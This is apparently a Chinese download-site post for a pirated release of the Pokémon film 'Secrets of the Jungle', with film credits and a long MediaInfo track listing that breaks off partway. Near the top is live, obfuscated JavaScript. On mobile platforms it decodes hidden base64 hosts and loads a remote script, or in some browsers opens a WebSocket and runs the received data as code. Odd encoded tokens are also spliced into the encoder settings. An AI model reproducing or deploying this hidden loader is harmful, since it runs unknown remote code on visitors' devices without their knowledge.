宝可梦:皮卡丘和可可的冒险[国语配音/中文字幕].Pokemon.the.Movie.Secrets.of.the.Jungle.2021.1080p.NF.WEB-DL.DDP5.1.x264 15.07GB

版主小s 13天前 74

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 宝可梦:皮卡丘和可可的冒险 / 精灵宝可梦:可可 / 剧场版 精灵宝可梦 2020 / Pokémon the Movie: Secrets of the Jungle / Pokémon the Movie: Coco

◎片 名 劇場版 ポケットモンスター ココ

◎年 代 2020

◎产 地 日本

◎类 别 剧情 / 动画 / 冒险

◎语 言 日语

◎上映日期 2021-09-10(中国大陆) / 2020-12-25(日本)

◎IMDb链接 https://www.imdb.com/title/tt11819890/

◎豆瓣评分 6.8/10 (9211人评价)

◎豆瓣链接 https://movie.douban.com/subject/34943015/

◎片 长 98分钟

◎导 演 矢岛哲生 Tetsuo Yajima (id:1407534)

◎编 剧 富冈淳广 Atsuhiro Tomioka (id:1312900)

矢岛哲生 Tetsuo Yajima (id:1407534)

田尻智 Satoshi Tajiri (id:1051550)

◎演 员 松本梨香 Rica Matsumoto (id:1040476)

大谷育江 Ikue Ootani (id:1025401)

林原惠美 Megumi Hayashibara (id:1002915)

三木真一郎 Shinichir? Miki (id:1036235)

犬山犬子 Inuko Inuyama (id:1039597)

堀内贤雄 Ken'y? Horiuchi (id:1091129)

上白石萌歌 Moka Kamishiraishi (id:1316663)

中村勘九郎 Kantarou Nakamura (id:1042947)

中川翔子 Sh?ko Nakagawa (id:1045691)

◎标 签 宝可梦 / 宠物小精灵 / 动画 / 日本 / 剧场版 / 动漫 / 冒险 / 日本动画电影

◎简 介

《宝可梦:皮卡丘和可可的冒险》是陪伴中国观众多年的《宝可梦》系列第23部剧场版,讲述森林遭遇危机时,小智、皮卡丘与可可一同挺身而出,为保护森林中的宝可梦而战。除了一贯的可爱的宝可梦形象外,本片还着重刻画了萨戮德与可可之间超越血缘的父子情谊。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 65441967248257166240401492154830387779 (0x313BAA185DD089A6149436693F457A43)

  4. Complete name : Pokemon.the.Mov[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 15.1 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 21.6 Mb/s

  11. Encoded date : UTC 2021-10-11 10:50:37

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 39 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 677 kb/s

  26. Nominal bit rate : 4 870 kb/s

  27. Maximum bit rate : 7 305 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 23.976 (24000/1001/53354) FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.074

  38. Stream size : 2.56 GiB (17%)

  39. Writing library : x264 core 148 r2724 dbe0335

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=23 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=4870 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=7305 / vbv_bufsize=9740 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 39 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 457 MiB (3%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 39 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 457 MiB (3%)

  78. Title : Arabic

  79. Language : Arabic

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 1 h 39 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 457 MiB (3%)

  98. Title : Croatian

  99. Language : Croatian

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 1 h 39 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 457 MiB (3%)

  118. Title : Czech

  119. Language : Czech

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 1 h 39 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 457 MiB (3%)

  138. Title : Danish

  139. Language : Danish

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Audio #6

  144. ID : 7

  145. Format : E-AC-3

  146. Format/Info : Enhanced AC-3

  147. Commercial name : Dolby Digital Plus

  148. Codec ID : A_EAC3

  149. Duration : 1 h 39 min

  150. Bit rate mode : Constant

  151. Bit rate : 640 kb/s

  152. Channel(s) : 6 channels

  153. Channel layout : L R C LFE Ls Rs

  154. Sampling rate : 48.0 kHz

  155. Frame rate : 31.250 FPS (1536 SPF)

  156. Compression mode : Lossy

  157. Stream size : 457 MiB (3%)

  158. Title : Dutch

  159. Language : Dutch

  160. Service kind : Complete Main

  161. Default : No

  162. Forced : No


  163. Audio #7

  164. ID : 8

  165. Format : E-AC-3

  166. Format/Info : Enhanced AC-3

  167. Commercial name : Dolby Digital Plus

  168. Codec ID : A_EAC3

  169. Duration : 1 h 39 min

  170. Bit rate mode : Constant

  171. Bit rate : 640 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 457 MiB (3%)

  178. Title : Finnish

  179. Language : Finnish

  180. Service kind : Complete Main

  181. Default : No

  182. Forced : No


  183. Audio #8

  184. ID : 9

  185. Format : E-AC-3

  186. Format/Info : Enhanced AC-3

  187. Commercial name : Dolby Digital Plus

  188. Codec ID : A_EAC3

  189. Duration : 1 h 39 min

  190. Bit rate mode : Constant

  191. Bit rate : 640 kb/s

  192. Channel(s) : 6 channels

  193. Channel layout : L R C LFE Ls Rs

  194. Sampling rate : 48.0 kHz

  195. Frame rate : 31.250 FPS (1536 SPF)

  196. Compression mode : Lossy

  197. Stream size : 457 MiB (3%)

  198. Title : French

  199. Language : French

  200. Service kind : Complete Main

  201. Default : No

  202. Forced : No


  203. Audio #9

  204. ID : 10

  205. Format : E-AC-3

  206. Format/Info : Enhanced AC-3

  207. Commercial name : Dolby Digital Plus

  208. Codec ID : A_EAC3

  209. Duration : 1 h 39 min

  210. Bit rate mode : Constant

  211. Bit rate : 640 kb/s

  212. Channel(s) : 6 channels

  213. Channel layout : L R C LFE Ls Rs

  214. Sampling rate : 48.0 kHz

  215. Frame rate : 31.250 FPS (1536 SPF)

  216. Compression mode : Lossy

  217. Stream size : 457 MiB (3%)

  218. Title : German

  219. Language : German

  220. Service kind : Complete Main

  221. Default : No

  222. Forced : No


  223. Audio #10

  224. ID : 11

  225. Format : E-AC-3

  226. Format/Info : Enhanced AC-3

  227. Commercial name : Dolby Digital Plus

  228. Codec ID : A_EAC3

  229. Duration : 1 h 39 min

  230. Bit rate mode : Constant

  231. Bit rate : 640 kb/s

  232. Channel(s) : 6 channels

  233. Channel layout : L R C LFE Ls Rs

  234. Sampling rate : 48.0 kHz

  235. Frame rate : 31.250 FPS (1536 SPF)

  236. Compression mode : Lossy

  237. Stream size : 457 MiB (3%)

  238. Title : Greek

  239. Language : Greek

  240. Service kind : Complete Main

  241. Default : No

  242. Forced : No


  243. Audio #11

  244. ID : 12

  245. Format : E-AC-3

  246. Format/Info : Enhanced AC-3

  247. Commercial name : Dolby Digital Plus

  248. Codec ID : A_EAC3

  249. Duration : 1 h 39 min

  250. Bit rate mode : Constant

  251. Bit rate : 640 kb/s

  252. Channel(s) : 6 channels

  253. Channel layout : L R C LFE Ls Rs

  254. Sampling rate : 48.0 kHz

  255. Frame rate : 31.250 FPS (1536 SPF)

  256. Compression mode : Lossy

  257. Stream size : 457 MiB (3%)

  258. Title : Hebrew

  259. Language : Hebrew

  260. Service kind : Complete Main

  261. Default : No

  262. Forced : No


  263. Audio #12

  264. ID : 13

  265. Format : E-AC-3

  266. Format/Info : Enhanced AC-3

  267. Commercial name : Dolby Digital Plus

  268. Codec ID : A_EAC3

  269. Duration : 1 h 39 min

  270. Bit rate mode : Constant

  271. Bit rate : 640 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 457 MiB (3%)

  278. Title : Hindi

  279. Language : Hindi

  280. Service kind : Complete Main

  281. Default : No

  282. Forced : No


  283. Audio #13

  284. ID : 14

  285. Format : E-AC-3

  286. Format/Info : Enhanced AC-3

  287. Commercial name : Dolby Digital Plus

  288. Codec ID : A_EAC3

  289. Duration : 1 h 39 min

  290. Bit rate mode : Constant

  291. Bit rate : 640 kb/s

  292. Channel(s) : 6 channels

  293. Channel layout : L R C LFE Ls Rs

  294. Sampling rate : 48.0 kHz

  295. Frame rate : 31.250 FPS (1536 SPF)

  296. Compression mode : Lossy

  297. Stream size : 457 MiB (3%)

  298. Title : Hungarian

  299. Language : Hungarian

  300. Service kind : Complete Main

  301. Default : No

  302. Forced : No


  303. Audio #14

  304. ID : 15

  305. Format : E-AC-3

  306. Format/Info : Enhanced AC-3

  307. Commercial name : Dolby Digital Plus

  308. Codec ID : A_EAC3

  309. Duration : 1 h 39 min

  310. Bit rate mode : Constant

  311. Bit rate : 640 kb/s

  312. Channel(s) : 6 channels

  313. Channel layout : L R C LFE Ls Rs

  314. Sampling rate : 48.0 kHz

  315. Frame rate : 31.250 FPS (1536 SPF)

  316. Compression mode : Lossy

  317. Stream size : 457 MiB (3%)

  318. Title : Indonesian

  319. Language : Indonesian

  320. Service kind : Complete Main

  321. Default : No

  322. Forced : No


  323. Audio #15

  324. ID : 16

  325. Format : E-AC-3

  326. Format/Info : Enhanced AC-3

  327. Commercial name : Dolby Digital Plus

  328. Codec ID : A_EAC3

  329. Duration : 1 h 39 min

  330. Bit rate mode : Constant

  331. Bit rate : 640 kb/s

  332. Channel(s) : 6 channels

  333. Channel layout : L R C LFE Ls Rs

  334. Sampling rate : 48.0 kHz

  335. Frame rate : 31.250 FPS (1536 SPF)

  336. Compression mode : Lossy

  337. Stream size : 457 MiB (3%)

  338. Title : Italian

  339. Language : Italian

  340. Service kind : Complete Main

  341. Default : No

  342. Forced : No


  343. Audio #16

  344. ID : 17

  345. Format : E-AC-3

  346. Format/Info : Enhanced AC-3

  347. Commercial name : Dolby Digital Plus

  348. Codec ID : A_EAC3

  349. Duration : 1 h 39 min

  350. Bit rate mode : Constant

  351. Bit rate : 640 kb/s

  352. Channel(s) : 6 channels

  353. Channel layout : L R C LFE Ls Rs

  354. Sampling rate : 48.0 kHz

  355. Frame rate : 31.250 FPS (1536 SPF)

  356. Compression mode : Lossy

  357. Stream size : 457 MiB (3%)

  358. Title : Mandarin

  359. Language : Chinese

  360. Service kind : Complete Main

  361. Default : No

  362. Forced : No


  363. Audio #17

  364. ID : 18

  365. Format : E-AC-3

  366. Format/Info : Enhanced AC-3

  367. Commercial name : Dolby Digital Plus

  368. Codec ID : A_EAC3

  369. Duration : 1 h 39 min

  370. Bit rate mode : Constant

  371. Bit rate : 640 kb/s

  372. Channel(s) : 6 channels

  373. Channel layout : L R C LFE Ls Rs

  374. Sampling rate : 48.0 kHz

  375. Frame rate : 31.250 FPS (1536 SPF)

  376. Compression mode : Lossy

  377. Stream size : 457 MiB (3%)

  378. Title : Norwegian

  379. Language : Norwegian

  380. Service kind : Complete Main

  381. Default : No

  382. Forced : No


  383. Audio #18

  384. ID : 19

  385. Format : E-AC-3

  386. Format/Info : Enhanced AC-3

  387. Commercial name : Dolby Digital Plus

  388. Codec ID : A_EAC3

  389. Duration : 1 h 39 min

  390. Bit rate mode : Constant

  391. Bit rate : 640 kb/s

  392. Channel(s) : 6 channels

  393. Channel layout : L R C LFE Ls Rs

  394. Sampling rate : 48.0 kHz

  395. Frame rate : 31.250 FPS (1536 SPF)

  396. Compression mode : Lossy

  397. Stream size : 457 MiB (3%)

  398. Title : Polish

  399. Language : Polish

  400. Service kind : Complete Main

  401. Default : No

  402. Forced : No


  403. Audio #19

  404. ID : 20

  405. Format : E-AC-3

  406. Format/Info : Enhanced AC-3

  407. Commercial name : Dolby Digital Plus

  408. Codec ID : A_EAC3

  409. Duration : 1 h 39 min

  410. Bit rate mode : Constant

  411. Bit rate : 640 kb/s

  412. Channel(s) : 6 channels

  413. Channel layout : L R C LFE Ls Rs

  414. Sampling rate : 48.0 kHz

  415. Frame rate : 31.250 FPS (1536 SPF)

  416. Compression mode : Lossy

  417. Stream size : 457 MiB (3%)

  418. Title : Portuguese

  419. Language : Portuguese

  420. Service kind : Complete Main

  421. Default : No

  422. Forced : No


  423. Audio #20

  424. ID : 21

  425. Format : E-AC-3

  426. Format/Info : Enhanced AC-3

  427. Commercial name : Dolby Digital Plus

  428. Codec ID : A_EAC3

  429. Duration : 1 h 39 min

  430. Bit rate mode : Constant

  431. Bit rate : 640 kb/s

  432. Channel(s) : 6 channels

  433. Channel layout : L R C LFE Ls Rs

  434. Sampling rate : 48.0 kHz

  435. Frame rate : 31.250 FPS (1536 SPF)

  436. Compression mode : Lossy

  437. Stream size : 457 MiB (3%)

  438. Title : Brazilian Portuguese

  439. Language : Portuguese

  440. Service kind : Complete Main

  441. Default : No

  442. Forced : No


  443. Audio #21

  444. ID : 22

  445. Format : E-AC-3

  446. Format/Info : Enhanced AC-3

  447. Commercial name : Dolby Digital Plus

  448. Codec ID : A_EAC3

  449. Duration : 1 h 39 min

  450. Bit rate mode : Constant

  451. Bit rate : 640 kb/s

  452. Channel(s) : 6 channels

  453. Channel layout : L R C LFE Ls Rs

  454. Sampling rate : 48.0 kHz

  455. Frame rate : 31.250 FPS (1536 SPF)

  456. Compression mode : Lossy

  457. Stream size : 457 MiB (3%)

  458. Title : Romanian

  459. Language : Romanian

  460. Service kind : Complete Main

  461. Default : No

  462. Forced : No


  463. Audio #22

  464. ID : 23

  465. Format : E-AC-3

  466. Format/Info : Enhanced AC-3

  467. Commercial name : Dolby Digital Plus

  468. Codec ID : A_EAC3

  469. Duration : 1 h 39 min

  470. Bit rate mode : Constant

  471. Bit rate : 640 kb/s

  472. Channel(s) : 6 channels

  473. Channel layout : L R C LFE Ls Rs

  474. Sampling rate : 48.0 kHz

  475. Frame rate : 31.250 FPS (1536 SPF)

  476. Compression mode : Lossy

  477. Stream size : 457 MiB (3%)

  478. Title : Russian

  479. Language : Russian

  480. Service kind : Complete Main

  481. Default : No

  482. Forced : No


  483. Audio #23

  484. ID : 24

  485. Format : E-AC-3

  486. Format/Info : Enhanced AC-3

  487. Commercial name : Dolby Digital Plus

  488. Codec ID : A_EAC3

  489. Duration : 1 h 39 min

  490. Bit rate mode : Constant

  491. Bit rate : 640 kb/s

  492. Channel(s) : 6 channels

  493. Channel layout : L R C LFE Ls Rs

  494. Sampling rate : 48.0 kHz

  495. Frame rate : 31.250 FPS (1536 SPF)

  496. Compression mode : Lossy

  497. Stream size : 457 MiB (3%)

  498. Title : Spanish

  499. Language : Spanish

  500. Service kind : Complete Main

  501. Default : No

  502. Forced : No


  503. Audio #24

  504. ID : 25

  505. Format : E-AC-3

  506. Format/Info : Enhanced AC-3

  507. Commercial name : Dolby Digital Plus

  508. Codec ID : A_EAC3

  509. Duration : 1 h 39 min

  510. Bit rate mode : Constant

  511. Bit rate : 640 kb/s

  512. Channel(s) : 6 channels

  513. Channel layout : L R C LFE Ls Rs

  514. Sampling rate : 48.0 kHz

  515. Frame rate : 31.250 FPS (1536 SPF)

  516. Compression mode : Lossy

  517. Stream size : 457 MiB (3%)

  518. Title : European Spanish

  519. Language : Spanish

  520. Service kind : Complete Main

  521. Default : No

  522. Forced : No


  523. Audio #25

  524. ID : 26

  525. Format : E-AC-3

  526. Format/Info : Enhanced AC-3

  527. Commercial name : Dolby Digital Plus

  528. Codec ID : A_EAC3

  529. Duration : 1 h 39 min

  530. Bit rate mode : Constant

  531. Bit rate : 640 kb/s

  532. Channel(s) : 6 channels

  533. Channel layout : L R C LFE Ls Rs

  534. Sampling rate : 48.0 kHz

  535. Frame rate : 31.250 FPS (1536 SPF)

  536. Compression mode : Lossy

  537. Stream size : 457 MiB (3%)

  538. Title : Swedish

  539. Language : Swedish

  540. Service kind : Complete Main

  541. Default : No

  542. Forced : No


  543. Audio #26

  544. ID : 27

  545. Format : E-AC-3

  546. Format/Info : Enhanced AC-3

  547. Commercial name : Dolby Digital Plus

  548. Codec ID : A_EAC3

  549. Duration : 1 h 39 min

  550. Bit rate mode : Constant

  551. Bit rate : 640 kb/s

  552. Channel(s) : 6 channels

  553. Channel layout : L R C LFE Ls Rs

  554. Sampling rate : 48.0 kHz

  555. Frame rate : 31.250 FPS (1536 SPF)

  556. Compression mode : Lossy

  557. Stream size : 457 MiB (3%)

  558. Title : Thai

  559. Language : Thai

  560. Service kind : Complete Main

  561. Default : No

  562. Forced : No


  563. Audio #27

  564. ID : 28

  565. Format : E-AC-3

  566. Format/Info : Enhanced AC-3

  567. Commercial name : Dolby Digital Plus

  568. Codec ID : A_EAC3

  569. Duration : 1 h 39 min

  570. Bit rate mode : Constant

  571. Bit rate : 640 kb/s

  572. Channel(s) : 6 channels

  573. Channel layout : L R C LFE Ls Rs

  574. Sampling rate : 48.0 kHz

  575. Frame rate : 31.250 FPS (1536 SPF)

  576. Compression mode : Lossy

  577. Stream size : 457 MiB (3%)

  578. Title : Turkish

  579. Language : Turkish

  580. Service kind : Complete Main

  581. Default : No

  582. Forced : No


  583. Audio #28

  584. ID : 29

  585. Format : E-AC-3

  586. Format/Info : Enhanced AC-3

  587. Commercial name : Dolby Digital Plus

  588. Codec ID : A_EAC3

  589. Duration : 1 h 39 min

  590. Bit rate mode : Constant

  591. Bit rate : 640 kb/s

  592. Channel(s) : 6 channels

  593. Channel layout : L R C LFE Ls Rs

  594. Sampling rate : 48.0 kHz

  595. Frame rate : 31.250 FPS (1536 SPF)

  596. Compression mode : Lossy

  597. Stream size : 457 MiB (3%)

  598. Title : Ukrainian

  599. Language : Ukrainian

  600. Service kind : Complete Main

  601. Default : No

  602. Forced : No


  603. Text #1

  604. ID : 30

  605. Format : UTF-8

  606. Codec ID : S_TEXT/UTF8

  607. Codec ID/Info : UTF-8 Plain Text

  608. Duration : 1 h 35 min

  609. Bit rate : 79 b/s

  610. Count of elements : 1841

  611. Stream size : 55.6 KiB (0%)

  612. Title : English

  613. Language : English

  614. Default : Yes

  615. Forced : No


  616. Text #2

  617. ID : 31

  618. Format : UTF-8

  619. Codec ID : S_TEXT/UTF8

  620. Codec ID/Info : UTF-8 Plain Text

  621. Duration : 1 h 35 min

  622. Bit rate : 86 b/s

  623. Count of elements : 1191

  624. Stream size : 60.2 KiB (0%)

  625. Title : Arabic

  626. Language : Arabic

  627. Default : No

  628. Forced : No


  629. Text #3

  630. ID : 32

  631. Format : UTF-8

  632. Codec ID : S_TEXT/UTF8

  633. Codec ID/Info : UTF-8 Plain Text

  634. Duration : 1 h 35 min

  635. Bit rate : 55 b/s

  636. Count of elements : 1403

  637. Stream size : 38.9 KiB (0%)

  638. Title : Chinese Simplified

  639. Language : Chinese

  640. Default : No

  641. Forced : No


  642. Text #4

  643. ID : 33

  644. Format : UTF-8

  645. Codec ID : S_TEXT/UTF8

  646. Codec ID/Info : UTF-8 Plain Text

  647. Duration : 1 h 35 min

  648. Bit rate : 56 b/s

  649. Count of elements : 1403

  650. Stream size : 39.5 KiB (0%)

  651. Title : Chinese Traditional

  652. Language : Chinese

  653. Default : No

  654. Forced : No


  655. Text #5

  656. ID : 34

  657. Format : UTF-8

  658. Codec ID : S_TEXT/UTF8

  659. Codec ID/Info : UTF-8 Plain Text

  660. Duration : 1 h 37 min

  661. Bit rate : 44 b/s

  662. Count of elements : 1342

  663. Stream size : 32.2 KiB (0%)

  664. Title : Croatian

  665. Language : Croatian

  666. Default : No

  667. Forced : No


  668. Text #6

  669. ID : 35

  670. Format : UTF-8

  671. Codec ID : S_TEXT/UTF8

  672. Codec ID/Info : UTF-8 Plain Text

  673. Duration : 1 h 35 min

  674. Bit rate : 49 b/s

  675. Count of elements : 1172

  676. Stream size : 34.8 KiB (0%)

  677. Title : Czech

  678. Language : Czech

  679. Default : No

  680. Forced : No


  681. Text #7

  682. ID : 36

  683. Format : UTF-8

  684. Codec ID : S_TEXT/UTF8

  685. Codec ID/Info : UTF-8 Plain Text

  686. Duration : 1 h 35 min

  687. Bit rate : 50 b/s

  688. Count of elements : 1033

  689. Stream size : 35.3 KiB (0%)

  690. Title : Danish

  691. Language : Danish

  692. Default : No

  693. Forced : No


  694. Text #8

  695. ID : 37

  696. Format : UTF-8

  697. Codec ID : S_TEXT/UTF8

  698. Codec ID/Info : UTF-8 Plain Text

  699. Duration : 1 h 35 min

  700. Bit rate : 55 b/s

  701. Count of elements : 1067

  702. Stream size : 39.1 KiB (0%)

  703. Title : Dutch

  704. Language : Dutch

  705. Default : No

  706. Forced : No


  707. Text #9

  708. ID : 38

  709. Format : UTF-8

  710. Codec ID : S_TEXT/UTF8

  711. Codec ID/Info : UTF-8 Plain Text

  712. Duration : 1 h 35 min

  713. Bit rate : 50 b/s

  714. Count of elements : 1190

  715. Stream size : 35.3 KiB (0%)

  716. Title : Finnish

  717. Language : Finnish

  718. Default : No

  719. Forced : No


  720. Text #10

  721. ID : 39

  722. Format : UTF-8

  723. Codec ID : S_TEXT/UTF8

  724. Codec ID/Info : UTF-8 Plain Text

  725. Duration : 1 h 35 min

  726. Bit rate : 52 b/s

  727. Count of elements : 1154

  728. Stream size : 36.5 KiB (0%)

  729. Title : French

  730. Language : French

  731. Default : No

  732. Forced : No


  733. Text #11

  734. ID : 40

  735. Format : UTF-8

  736. Codec ID : S_TEXT/UTF8

  737. Codec ID/Info : UTF-8 Plain Text

  738. Duration : 1 h 35 min

  739. Bit rate : 48 b/s

  740. Count of elements : 1192

  741. Stream size : 34.2 KiB (0%)

  742. Title : German

  743. Language : German

  744. Default : No

  745. Forced : No


  746. Text #12

  747. ID : 41

  748. Format : UTF-8

  749. Codec ID : S_TEXT/UTF8

  750. Codec ID/Info : UTF-8 Plain Text

  751. Duration : 1 h 37 min

  752. Bit rate : 76 b/s

  753. Count of elements : 1204

  754. Stream size : 55.2 KiB (0%)

  755. Title : Greek

  756. Language : Greek

  757. Default : No

  758. Forced : No


  759. Text #13

  760. ID : 42

  761. Format : UTF-8

  762. Codec ID : S_TEXT/UTF8

  763. Codec ID/Info : UTF-8 Plain Text

  764. Duration : 1 h 35 min

  765. Bit rate : 85 b/s

  766. Count of elements : 1193

  767. Stream size : 59.8 KiB (0%)

  768. Title : Hebrew

  769. Language : Hebrew

  770. Default : No

  771. Forced : No


  772. Text #14

  773. ID : 43

  774. Format : UTF-8

  775. Codec ID : S_TEXT/UTF8

  776. Codec ID/Info : UTF-8 Plain Text

  777. Duration : 1 h 35 min

  778. Bit rate : 138 b/s

  779. Count of elements : 1298

  780. Stream size : 96.5 KiB (0%)

  781. Title : Hindi

  782. Language : Hindi

  783. Default : No

  784. Forced : No


  785. Text #15

  786. ID : 44

  787. Format : UTF-8

  788. Codec ID : S_TEXT/UTF8

  789. Codec ID/Info : UTF-8 Plain Text

  790. Duration : 1 h 37 min

  791. Bit rate : 49 b/s

  792. Count of elements : 1396

  793. Stream size : 35.2 KiB (0%)

  794. Title : Hungarian

  795. Language : Hungarian

  796. Default : No

  797. Forced : No


  798. Text #16

  799. ID : 45

  800. Format : UTF-8

  801. Codec ID : S_TEXT/UTF8

  802. Codec ID/Info : UTF-8 Plain Text

  803. Duration : 1 h 35 min

  804. Bit rate : 59 b/s

  805. Count of elements : 1385

  806. Stream size : 41.6 KiB (0%)

  807. Title : Indonesian

  808. Language : Indonesian

  809. Default : No

  810. Forced : No


  811. Text #17

  812. ID : 46

  813. Format : UTF-8

  814. Codec ID : S_TEXT/UTF8

  815. Codec ID/Info : UTF-8 Plain Text

  816. Duration : 1 h 35 min

  817. Bit rate : 48 b/s

  818. Count of elements : 1190

  819. Stream size : 33.6 KiB (0%)

  820. Title : Italian

  821. Language : Italian

  822. Default : No

  823. Forced : No


  824. Text #18

  825. ID : 47

  826. Format : UTF-8

  827. Codec ID : S_TEXT/UTF8

  828. Codec ID/Info : UTF-8 Plain Text

  829. Duration : 1 h 35 min

  830. Bit rate : 55 b/s

  831. Count of elements : 1303

  832. Stream size : 39.1 KiB (0%)

  833. Title : Malay

  834. Language : Malay

  835. Default : No

  836. Forced : No


  837. Text #19

  838. ID : 48

  839. Format : UTF-8

  840. Codec ID : S_TEXT/UTF8

